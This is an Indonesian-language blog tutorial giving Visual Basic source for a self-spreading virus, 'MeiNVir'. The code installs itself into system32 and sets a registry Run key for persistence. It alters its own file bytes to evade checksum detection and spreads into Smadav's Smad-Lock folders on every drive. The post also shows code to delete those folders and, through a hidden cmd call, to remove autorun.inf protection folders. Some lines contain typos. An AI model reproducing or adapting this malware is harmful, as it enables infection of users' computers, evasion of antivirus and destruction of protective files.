Jika Semua Virus Lokal Bisa Menembus Smad-Lock

Virus yang akan kita bahas disini tidak lah berbahaya, hanya akan masuk ke dalam smad-lock. Mengcopykan dirinya ke dalam, lalu membuat satu pesan (satu file notepad) di dalamnya, sekaligus memodif file ’readme.txt’ yang ada di dalamnya.

Buka VisualBasic-mu. Lalu masukkan referensi "Microsoft Scripting Runtime."Lihat gambar dibawah ini.

Masukkan satu listbox ke dalam form. Namai listbox tersebut list1
Lalu ketikkan source berikut:
Private Declare Function GetLogicalDrives Lib "kernel32" Alias "GetLogicalDrives" () As Long
Dim fso As New Scripting.FileSystemObject
Private Sub Form_Load()
ambilDrive
install
regist
End Sub

Sub regist()

Dim b As Object
Set b = CreateObject("wscript.shell")
b.regwrite "HKLM\Software\microsoft\windows\currentversion\run\MeiNVir", Environ$("windir") & "\system32\MeiNVir.exe"

End Sub
Sub install()
MutasiKe Environ$("windir") & "\system32\MeiNVir.exe"
End Sub

Fungsi source diatas itu untuk menginstallkan diri ke dalam komputer korban dan membuat startup di regedit. Saya rasa semua sudah mengerti ini.

Function MutasiKe(Lokasi As String)
If fso.FileExists(Lokasi) Then Exit Function
ReDim KodeVirus(FileLen(App.Path & "\" & App.EXEName & ".exe")) As Byte
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
Get #1, , KodeVirus
Close #1
Open Lokasi For Binary As #1
Put #1, , KodeVirus
Put #1, , Format(Time, "hh:mm:ss") & " " & Format(Date, "dd:mm")
Close #1
End Function

Buat fungsi 'Mutasike' untuk trik polymorphic. Trik ini fungsinya untuk menghindarkan diri dari pendeteksian checksum file seperti crc32 dan md5. Yang ini saya rasa juga pada ngerti semuanya.
Setelah ini masukkan satu timer. Namai timer tersebut "Timer1”"dan berikut ini source untuk timer tersebut.

Private Sub Timer1_Timer()
Dim i As Integer
ambilDrive
For i = 0 To List1.ListCount – 1
If fso.FolderExists(List1.List(i) & ChrW(916) & " Smad-Lock (Brankas Smadav) "& ChrW(916)) Then
DoTrick List1.List(i) & ChrW(916) & "Smad-Lock (Brankas Smadav) " & ChrW(916)
ElseIf fso.FolderExists(List1.List(i) & ChrW(916) & " Smad-Lock " & ChrW(916)) Then
DoTrick List1.List(i) & ChrW(916) & " Smad-Lock " & ChrW(916)
End If
Next
End Sub

Si Timer akan melaksanakan kerjanya yaitu mengerjakan suatu trik yang kita sebut "Do Trick"
Untuk intervalnya bisa kalian set sendiri…. MeiNVir memakai interval 10000 (kira-kira 10 detik).
Lihat source di atas, virus kita ini bakal mengecek 2 jenis smad-lock! Smad-lock yang bertulisan "Brankas Smadav" dan yang satunya lagi tidak bertuliskan "Brankas smadav"

Sub ambilDrive()
On Error Resume Next
Dim LDs As Long, lng As Long, sDrives As String
LDs = GetLogicalDrives
For lng = 0 To 25
If (LDs And 2 ^ lng) 0 Then
List1.AddItem Chr(lng + 65) & ":\"
End If
Next lng
End Sub

Code ini fungsinya untuk mencari drive-drive yang aktif. Code ini bisa diganti dengan yang code lebih baik.

Function DoTrick(drive As String)
fso.CopyFolder drive, App.Path & "\Kill"
Open App.Path & "\Kill\Read Me.txt" For Output As #1
Print #1, "Smad-Lock ini telah berhasil disusupi oleh MeiNVir"
Close #1

Open App.Path & "\Kill\MeiNVir.txt" For Output As #1
Print #1, 'Smad-Lock sekarang tidak lagi aman"
Print #1, 'Smad-Lock ini telah berhasil disusupi oleh MeiNVir"
Print #1, ""
Print #1, "MeiNVir by: meiN"
Print #1, "File ini bukanlah 100% virus"
Print #1, "Hanya untuk menguji kemampuan antivirus lokal…"
Close #1
MutasiKe App.Path & "\Kill\MeiNVir2012.exe"
fso.CopyFolder App.Path & "\Kill", drive, True
fso.DeleteFolder App.Path & "\Kill"
End Function

Ini adalah trik yang kita maksud. Morphirii akan mengcopykan dirinya ke dalam smad-lock, dan membuat satu file notepad di dalamnya sekaligus memodif file ’readme.txt’ yang ada di dalamnya.

Kalau kamu mau menghapus smad-lock-nya mudah saja….
Codenya begini:
Fso.DeleteFolder (List1.List(i) & ChrW(916) & " Smad-Lock (Brankas Smadav) " & ChrW(916))
Atau
Fso.deletefolder List1.List(i) & ChrW(916) & " Smad-Lock " & ChrW(916)) Then
DoTrick List1.List(i) & ChrW(916) & " Smad-Lock " & ChrW(916)

Itupun setelah dilakukan pengecekan drive oleh Listbox yang tadi supaya tidak terjadi kacau balau ya…

Untuk penghapusan folder autorun.inf bisa dengan trik ini:
Sub hapusAuto(Dirname as strign)
On Error Resume Next
Shell ("CMD /C RD /S /Q \\.\\" & Chr(32) & Chr(34) & DirName & Chr(34)), vbHide
End Sub
Jadi untuk menghapus folder "G:\autorun.inf" codenya menjadi
hapusAuto "G:\autorun.inf"

Terimakasih,

By: meiNSoftLab

Thx to : Morphic Karta

Related Posts